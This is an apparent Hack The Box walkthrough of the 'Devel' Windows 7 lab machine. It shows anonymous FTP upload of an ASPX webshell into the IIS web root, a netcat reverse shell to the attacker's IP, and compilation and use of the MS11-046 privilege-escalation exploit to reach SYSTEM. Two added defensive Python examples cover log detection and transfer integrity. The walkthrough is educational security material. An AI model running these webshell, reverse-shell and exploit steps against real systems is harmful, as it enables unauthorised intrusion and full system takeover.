Devel



(Screenshot: Devel01.png)

Port scan

root@kali:~/HTB/Machines/Devel# nmap -A -T4 -v -oN nmap.txt devel
# Nmap 7.80 scan initiated Thu Nov 14 08:47:20 2019 as: nmap -A -T4 -v -oN nmap.txt devel
Nmap scan report for devel (10.10.10.5)
Host is up (0.044s latency).
rDNS record for 10.10.10.5: devel.htb
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.378 days (since Wed Nov 13 23:43:29 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 21/tcp)
HOP RTT      ADDRESS
1   44.49 ms 10.10.14.1
2   44.63 ms devel.htb (10.10.10.5)

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov 14 08:47:38 2019 -- 1 IP address (1 host up) scanned in 18.12 seconds

FTP & web server

The web server only serves the default IIS 7 start page, and the FTP server allows anonymous logins.

(Screenshot: Devel02.png)

We upload a test file to the FTP server through the anonymous account.

root@kali:~/HTB/Machines/Devel# cat hello.html
<html>Hello I am in</html>
root@kali:~/HTB/Machines/Devel# ftp devel
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put hello.html
local: hello.html remote: hello.html
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
28 bytes sent in 0.00 secs (379.7743 kB/s)
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
11-18-19  12:03AM                   28 hello.html
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
ftp> quit
221 Goodbye.

Then we check that we can see it on the web server: the anonymous FTP root is the IIS web root (c:\inetpub\wwwroot), so anything uploaded over FTP is served over HTTP.

(Screenshot: Devel03.png)

Push a webshell

root@kali:~/HTB/Machines/Devel# cp /usr/share/webshells/aspx/cmdasp.aspx ./
root@kali:~/HTB/Machines/Devel# ftp devel
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put cmdasp.aspx
local: cmdasp.aspx remote: cmdasp.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1442 bytes sent in 0.00 secs (11.0903 MB/s)
ftp> quit
221 Goodbye.

We can execute commands from the web shell.

(Screenshot: Devel04.png)
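What this sequence looks like from the server side, as an added example that is not part of the original write-up: the script below parses constructed IIS 7.5-style W3C FTP and web logs (the field lists and every log line are made up for the example, modelled on the events above) and flags completed anonymous STOR uploads of script or executable files, raising the severity when the web log later shows the same path being requested, which is the moment the upload became a webshell.

```python
from datetime import datetime

# Constructed sample logs (not taken from the page), written in the W3C extended format
# IIS uses. The #Fields header drives the parser, so a different field order still works.
FTP_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2019-11-18 00:03:10 10.10.14.34 - 10.10.10.5 21 USER anonymous 331 0 0 7c3a -
2019-11-18 00:03:10 10.10.14.34 anonymous 10.10.10.5 21 PASS *** 230 0 0 7c3a /
2019-11-18 00:03:12 10.10.14.34 anonymous 10.10.10.5 21 STOR hello.html 226 0 0 7c3a /hello.html
2019-11-18 00:05:40 10.10.14.34 anonymous 10.10.10.5 21 STOR cmdasp.aspx 226 0 0 7c3a /cmdasp.aspx
2019-11-18 00:09:02 10.10.14.34 anonymous 10.10.10.5 21 STOR nc.exe 226 0 0 7c3a /nc.exe
2019-11-18 00:09:03 10.10.14.34 anonymous 10.10.10.5 21 QUIT - 221 0 0 7c3a -
"""

WEB_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2019-11-18 00:03:30 10.10.10.5 GET /hello.html - 80 - 10.10.14.34 Mozilla/5.0 200 0 0 15
2019-11-18 00:06:01 10.10.10.5 GET /cmdasp.aspx - 80 - 10.10.14.34 Mozilla/5.0 200 0 0 120
2019-11-18 00:06:15 10.10.10.5 POST /cmdasp.aspx - 80 - 10.10.14.34 Mozilla/5.0 200 0 0 340
"""

# Extensions that IIS will execute or load rather than serve as static content.
SCRIPT_EXT = {".aspx", ".asp", ".ashx", ".asmx", ".exe", ".dll", ".config"}


def parse_w3c(text):
    """Parse a W3C extended log into dicts keyed by the names in the #Fields header."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split())))
    return rows


def ts(row):
    """Combine the W3C date and time columns into a datetime."""
    return datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")


def find_anonymous_uploads(ftp_rows):
    """Completed (226) STOR commands by the anonymous account that drop executable content."""
    hits = []
    for r in ftp_rows:
        if r.get("cs-method") != "STOR" or r.get("cs-username") != "anonymous":
            continue
        if r.get("sc-status") != "226":
            continue
        name = r["cs-uri-stem"]
        ext = name[name.rfind("."):].lower() if "." in name else ""
        if ext in SCRIPT_EXT:
            hits.append({"when": ts(r), "client": r["c-ip"], "file": r["x-fullpath"]})
    return hits


def correlate_with_web(uploads, web_rows):
    """Raise severity for uploads that were later requested over HTTP (upload became a webshell)."""
    findings = []
    for up in uploads:
        severity = "medium"
        for w in web_rows:
            if w["cs-uri-stem"].lower() == up["file"].lower() and ts(w) >= up["when"]:
                severity = "high"
                break
        findings.append({**up, "severity": severity})
    return findings


if __name__ == "__main__":
    uploads = find_anonymous_uploads(parse_w3c(FTP_LOG))
    for f in correlate_with_web(uploads, parse_w3c(WEB_LOG)):
        print(f"[{f['severity']}] {f['when']} {f['client']} uploaded {f['file']}")
```

The two findings this produces (cmdasp.aspx as high, nc.exe as medium, hello.html ignored) are exactly the two events an operator would want paged on; the underlying fix is to stop the FTP site's anonymous account from writing into the IIS web root at all, either by removing write permission or by giving FTP its own root directory.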

Full reverse shell

Download nc for Windows

root@kali:~/HTB/Machines/Devel# wget https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip
--2019-11-14 11:31:01--  https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip
Resolving eternallybored.org (eternallybored.org)... 84.255.206.8, 2a01:260:4094:1:42:42:42:42
Connecting to eternallybored.org (eternallybored.org)|84.255.206.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 111892 (109K) [application/zip]
Saving to: ‘netcat-win32-1.12.zip’
netcat-win32-1.12.z 100%[==================>] 109.27K   241KB/s    in 0.5s 
2019-11-14 11:31:02 (241 KB/s) - ‘netcat-win32-1.12.zip’ saved [111892/111892]

Unzip the file

root@kali:~/HTB/Machines/Devel# unzip -d netcat netcat-win32-1.12.zip
Archive:  netcat-win32-1.12.zip
 inflating: netcat/doexec.c
 inflating: netcat/getopt.c
 inflating: netcat/netcat.c
 inflating: netcat/generic.h
 inflating: netcat/getopt.h
 inflating: netcat/hobbit.txt
 inflating: netcat/license.txt
 inflating: netcat/readme.txt
 inflating: netcat/Makefile
 inflating: netcat/nc.exe
 inflating: netcat/nc64.exe
root@kali:~/HTB/Machines/Devel# cp netcat/nc.exe ./

Push nc to the server

root@kali:~/HTB/Machines/Devel# ftp devel
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put nc.exe
local: nc.exe remote: nc.exe
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
65573 bytes sent in 0.09 secs (715.1759 kB/s)
ftp> bye
221 Goodbye.

Run the listener

root@kali:~/HTB/Machines/Devel# rlwrap nc -lnvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555

Initiate the reverse shell

Launch the following command from the webshell.

c:\inetpub\wwwroot\nc.exe 10.10.14.34 5555 -e cmd.exe

(Screenshot: Devel05.png)

But it does not work: the webshell only returns "This program cannot be run in DOS mode", which is the message from the executable's MS-DOS stub.

The problem was that the file was transferred in FTP ASCII (text) mode instead of binary mode. ASCII mode rewrites line-ending bytes, which corrupts an executable; that is also why the two uploads of nc.exe reported different sizes (65573 vs 38616 bytes).
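To make the failure mode concrete, here is an added example (my own code, not from the write-up) that builds a small constructed PE-shaped image (an MZ header, a DOS stub carrying the familiar message, and the PE signature at the offset stored in e_lfanew), simulates what a Unix FTP client does in ASCII mode (every LF becomes CRLF), and shows that the copy no longer passes a basic PE sanity check while a binary-mode copy does. The integrity check at the end is what you would run after any upload: compare size and hash with the local file.

```python
import hashlib
import struct


def build_minimal_pe():
    """Construct a tiny PE-shaped image (not a real program) for the demonstration."""
    image = bytearray(0x100)
    image[0:2] = b"MZ"
    # Classic DOS stub: a few code bytes followed by the message text. The text ends with
    # an LF byte, which is exactly what an ASCII-mode transfer rewrites.
    stub = (b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"
            b"This program cannot be run in DOS mode.\r\n$")
    image[0x40:0x40 + len(stub)] = stub
    struct.pack_into("<I", image, 0x3C, 0x80)   # e_lfanew: file offset of the PE header
    image[0x80:0x84] = b"PE\0\0"
    return bytes(image)


def is_valid_pe(data):
    """Cheap sanity check on an uploaded file: MZ magic, e_lfanew in range, and the
    PE\\0\\0 signature at the offset e_lfanew points to."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 4 > len(data):
        return False
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def ascii_mode_transfer(data):
    """Simulate FTP type A (ASCII) on a Unix client: every LF is sent as CRLF."""
    return data.replace(b"\n", b"\r\n")


def binary_mode_transfer(data):
    """FTP type I (the 'bin' command): bytes are sent unchanged."""
    return data


def upload_intact(local, remote):
    """Post-upload integrity check: sizes and SHA-256 digests must match."""
    return (len(local) == len(remote)
            and hashlib.sha256(local).digest() == hashlib.sha256(remote).digest())


if __name__ == "__main__":
    original = build_minimal_pe()
    corrupted = ascii_mode_transfer(original)
    print("original valid PE:", is_valid_pe(original))
    print("ASCII-mode copy valid PE:", is_valid_pe(corrupted))   # header shifted by one byte
    print("size change:", len(original), "->", len(corrupted))
    print("binary-mode copy intact:", upload_intact(original, binary_mode_transfer(original)))
```

The single LF inside the DOS stub is enough: after conversion everything behind it is shifted by one byte, e_lfanew still says 0x80, and the loader finds no PE signature there. A real executable contains many more LF bytes, so the damage is correspondingly larger.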

Second transfer of nc.exe (binary mode)

root@kali:~/HTB/Machines/Devel# ftp devel
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> bin
200 Type set to I.
ftp> put nc.exe
local: nc.exe remote: nc.exe
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
38616 bytes sent in 0.00 secs (200.1472 MB/s)
ftp> bye
221 Goodbye.

Initiate the reverse shell

Launch the following command from the webshell.

c:\inetpub\wwwroot\nc.exe 10.10.14.34 5555 -e cmd.exe

(Screenshot: Devel08.png)

This time it works!

root@kali:~/HTB/Machines/Devel# rlwrap nc -lnvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.5.
Ncat: Connection from 10.10.10.5:49167.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web

Reverse shell with InsomniaShell

I used this reverse shell because I didn't know that the issue was the transfer mode of nc.exe.

Download InsomniaShell

root@kali:~/HTB/Machines/Devel# wget https://www.darknet.org.uk/content/files/InsomniaShell.zip
--2019-11-14 13:32:23--  https://www.darknet.org.uk/content/files/InsomniaShell.zip
Resolving www.darknet.org.uk (www.darknet.org.uk)... 45.79.65.87
Connecting to www.darknet.org.uk (www.darknet.org.uk)|45.79.65.87|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8902 (8.7K) [application/zip]
Saving to: ‘InsomniaShell.zip’
InsomniaShell.zip   100%[==================>]   8.69K  --.-KB/s    in 0s 
2019-11-14 13:32:23 (58.5 MB/s) - ‘InsomniaShell.zip’ saved [8902/8902]

Push InsomniaShell to the server

root@kali:~/HTB/Machines/Devel# ftp devel
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put InsomniaShell/InsomniaShell.aspx InsomniaShell.aspx
local: InsomniaShell/InsomniaShell.aspx remote: InsomniaShell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
45580 bytes sent in 0.09 secs (504.3878 kB/s)
ftp> bye
221 Goodbye.

Run the reverse shell

(Screenshot: Devel06.png)

On the listening console, the reverse shell connects.

root@kali:~/HTB/Machines/Devel# rlwrap nc -lnvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.5.
Ncat: Connection from 10.10.10.5:49160.
Shell enroute.......
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
c:\windows\system32\inetsrv>

Privilege escalation

The target runs an unpatched Windows 7 (6.1.7600 N/A Build 7600), which is vulnerable to MS11-046 (CVE-2011-1249, a local privilege escalation in afd.sys).

root@kali:~# searchsploit MS11-046
-------------------------------------- ----------------------------------------
 Exploit Title                        |  Path
                                      | (/usr/share/exploitdb/)
-------------------------------------- ----------------------------------------
Microsoft Windows (x86) - 'afd.sys' L | exploits/windows_x86/local/40564.c
Microsoft Windows - 'afd.sys' Local K | exploits/windows/dos/18755.c
-------------------------------------- ----------------------------------------
Shellcodes: No Result
------------------------------- -----------------------------------------------
 Paper Title                   |  Path
                               | (/usr/share/exploitdb-papers/)
------------------------------- -----------------------------------------------
MS11-046 - Dissecting a 0day   | docs/english/18712-ms11-046---dissecting-a-0da
------------------------------- -----------------------------------------------

Compile the exploit

root@kali:~/HTB/Machines/Devel# cp /usr/share/exploitdb/exploits/windows_x86/local/40564.c ./
root@kali:~/HTB/Machines/Devel# i686-w64-mingw32-gcc 40564.c -o MS11-046.exe -lws2_32

Upload the exploit to the server

root@kali:~/HTB/Machines/Devel# ftp devel
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> bin
200 Type set to I.
ftp> put MS11-046.exe
local: MS11-046.exe remote: MS11-046.exe
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
345251 bytes sent in 0.48 secs (709.0281 kB/s)
ftp> bye
221 Goodbye.

Run the exploit

From the reverse shell

Ncat: Connection from 10.10.10.5.
Ncat: Connection from 10.10.10.5:49163.
Shell enroute.......
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
c:\windows\system32\inetsrv>cd c:\inetpub\wwwroot
cd c:\inetpub\wwwroot
c:\inetpub\wwwroot>MS11-046.exe
MS11-046.exe
c:\Windows\System32>whoami
whoami
nt authority\system

User flag

c:\Windows\System32>cd ..
cd ..
c:\Windows>cd ..
cd ..
c:\>cd Users
cd Users
c:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 8620-71F1
Directory of c:\Users
18/03/2017  01:16    <DIR>          .
18/03/2017  01:16    <DIR>          ..
18/03/2017  01:16    <DIR>          Administrator
17/03/2017  04:17    <DIR>          babis
18/03/2017  01:06    <DIR>          Classic .NET AppPool
18/11/2019  05:20    <DIR>          Public
              0 File(s)              0 bytes
              6 Dir(s)  24.569.319.424 bytes free
c:\Users>cd babis
cd babis
c:\Users\babis>cd Desktop
cd Desktop
c:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
<USER FLAG>

Root flag

c:\Users\babis\Desktop>cd ..
cd ..
c:\Users\babis>cd ..
cd ..
c:\Users>cd Administrator
cd Administrator
c:\Users\Administrator>cd Desktop
cd Desktop
c:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
<ROOT FLAG>
c:\Users\Administrator\Desktop>exit
exit
Once the spawned SYSTEM shell exits, the exploit's own log is printed to the session:

[*] MS11-046 (CVE-2011-1249) x86 exploit
  [*] by Tomislav Paskalev
[*] Identifying OS
  [+] 32-bit
  [+] Windows 7
[*] Locating required OS components
  [+] ntkrnlpa.exe
     [*] Address:      0x8284c000
     [*] Offset:       0x007c0000
     [+] HalDispatchTable
        [*] Offset:    0x008e93b8
  [+] NtQueryIntervalProfile
     [*] Address:      0x77865510
  [+] ZwDeviceIoControlFile
     [*] Address:      0x77864ca0
[*] Setting up exploitation prerequisite
  [*] Initialising Winsock DLL
     [+] Done
     [*] Creating socket
        [+] Done
        [*] Connecting to closed port
           [+] Done
[*] Creating token stealing shellcode
  [*] Shellcode assembled
  [*] Allocating memory
     [+] Address:      0x02070000
     [*] Shellcode copied
[*] Exploiting vulnerability
  [*] Sending AFD socket connect request
     [+] Done
     [*] Elevating privileges to SYSTEM
        [+] Done
        [*] Spawning shell
[*] Exiting SYSTEM shell

Daniel Simao 08:52, 14 November 2019 (EST)